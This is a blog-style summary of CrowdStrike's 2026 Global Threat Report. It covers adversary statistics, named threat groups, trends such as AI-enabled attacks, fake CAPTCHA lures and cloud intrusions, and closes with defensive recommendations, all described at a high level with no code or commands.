Key Findings – CrowdStrike 2026 Global Threat Report

CrowdStrike recently published its 2026 Global Threat Report, which examines how cyber threats are evolving. As AI agents autonomously write code, analyse data, orchestrate workflows and support decision-making, businesses are operating in a fundamentally different environment than just a few short years ago. This new agentic era, where AI systems independently plan, reason and execute tasks at machine speed, is enabling every layer of business to become faster, more automated and increasingly interconnected.

Unfortunately, our organisations are not the only ones capitalising on this new era; our adversaries are too. AI-enabled attacks have increased rapidly, with the report highlighting an 89% year-on-year rise in AI-driven threat activity. AI enables cybercriminals to shorten the time between access and impact, accelerating lateral movement and significantly reducing the window for detection. What’s more, the attack surface has drastically expanded as the very AI systems that now underpin our businesses have become targets.

‍

The Evolution of Modern Day Adversaries

The threat landscape is expanding in scale, increasing in speed and evolving in sophistication. CrowdStrike tracked 24 new adversaries in 2025, bringing the total to 281, highlighting a broader and more complex ecosystem of eCrime and state-linked actors operating globally.

​

Key findings from 2025 include:

• Breakout time dropped to 29 minutes, down roughly 70% from 2021 levels
• The fastest recorded breakout was just 27 seconds
• 89% increase in attacks by AI-enabled adversaries
• 82% of detections were malware-free, up from 51% in 2020
• 35% of cloud incidents involved valid account abuse
• 42% increase in zero-day vulnerabilities exploited prior to public disclosure
• 37% rise in cloud-conscious intrusions, including a 266% increase by state-nexus actors
• China-nexus activity increased 38% overall, with an 85% rise targeting logistics

‍

The Growing Dominance of Interactive Intrusions

The continued rise of interactive intrusions was one of the defining themes in 2025. Rather than relying on traditional malware, adversaries increasingly favoured direct, human-driven attacks. Using legitimate credentials, native administrative tools and trusted software, threat actors blended into normal user behaviour while moving laterally across environments.

This shift to adversaries operating without obvious malicious files makes detection significantly more difficult, and the change was felt across many different industries. Technology remained the most frequently targeted sector (23%), followed by manufacturing (15%), retail (12%) and financial services (11%).

Three trends in particular illustrate this shift toward more evasive, human-driven attacks:

• CHATTY SPIDER: The eCrime group demonstrated the incredible speed of modern interactive intrusions, moving from initial access to attempted data exfiltration in just four minutes using legitimate remote tools.
• Fake CAPTCHA: Criminal actors increasingly use fake CAPTCHA lures to trick users into executing malicious code. Incidents surged by 563% in 2025, reflecting a shift toward more convincing, socially engineered delivery methods.
• Big game hunting dominates eCrime: BGH groups continue to drive high-impact ransomware operations. After a slower start to 2025, activity rebounded in the second half of the year, with spam volumes rising 141% and increasing cryptocurrency prices amplifying extortion incentives.

‍

Key Adversary Themes

Across 2025, CrowdStrike observed a threat landscape shaped by speed, scale and trust abuse. The themes below summarise how adversaries are adapting and who is driving the activity:

• Leveraging AI to enhance and accelerate operations: In 2025, both eCrime and state-nexus groups integrated AI into social engineering and technical operations, scaling existing attack methods rather than creating entirely new ones. FAMOUS CHOLLIMA, for example, used GenAI to generate fake personas for fraudulent employment schemes. Attacks by AI-enabled adversaries rose 89% YoY, reflecting increased speed and volume.
• Expanding ransomware operations: Ransomware actors continued shifting away from monitored endpoints toward cross-domain blind spots across identity, SaaS and virtualisation. SCATTERED SPIDER used help desk social engineering to gain access and deployed ransomware primarily on VMware ESXi, minimising endpoint visibility.
• Targeting network perimeter devices: China-nexus groups prioritised VPNs, firewalls and other edge devices for initial access, often maintaining persistence before pivoting deeper into environments. WARP PANDA rapidly exploited newly disclosed perimeter vulnerabilities in this approach.
• Compromising supply chains: Threat actors increasingly abused trust in software providers and third-party dependencies to bypass traditional controls. PRESSURE CHOLLIMA’s compromise of Safe{Wallet} to redirect funds from Bybit marked the largest crypto theft in history.
• Weaponising zero-day vulnerabilities: Zero-day exploitation increased 42% YoY, with rapid weaponisation defining 2025 activity. China-nexus actors operationalised exploits within days of disclosure, while GRACEFUL SPIDER repeatedly leveraged zero-days in large-scale campaigns.
• Subverting trust in cloud platforms and services: Cloud-conscious intrusions rose 37% YoY, including a 266% increase among named state-nexus actors. Techniques focused on identity and legitimate authentication flows. COZY BEAR, for example, used OAuth device-code phishing that kept victims on Microsoft's authentic infrastructure.

Countering the Threat Landscape

The 2026 Global Threat Report makes clear that today’s adversaries are faster, more evasive and increasingly cross-domain. AI is accelerating attack speed, zero-days are being weaponised rapidly, ransomware groups are exploiting blind spots, and cloud and identity systems are becoming primary targets.

For organisations, this means less time to detect, more surfaces to defend and greater reliance on proactive security. The report emphasises the need for unified visibility across endpoints, cloud and identity, rapid patching of internet-facing systems, stronger identity protection, and continuous monitoring capable of detecting lateral movement and credential abuse in real time.

Ultimately, security must evolve at the same pace as the threats it faces. Organisations that prioritise intelligence-led, cross-domain defence will be best positioned to counter the accelerating risk landscape.

If you would like to read the full report, you can download it here.

‍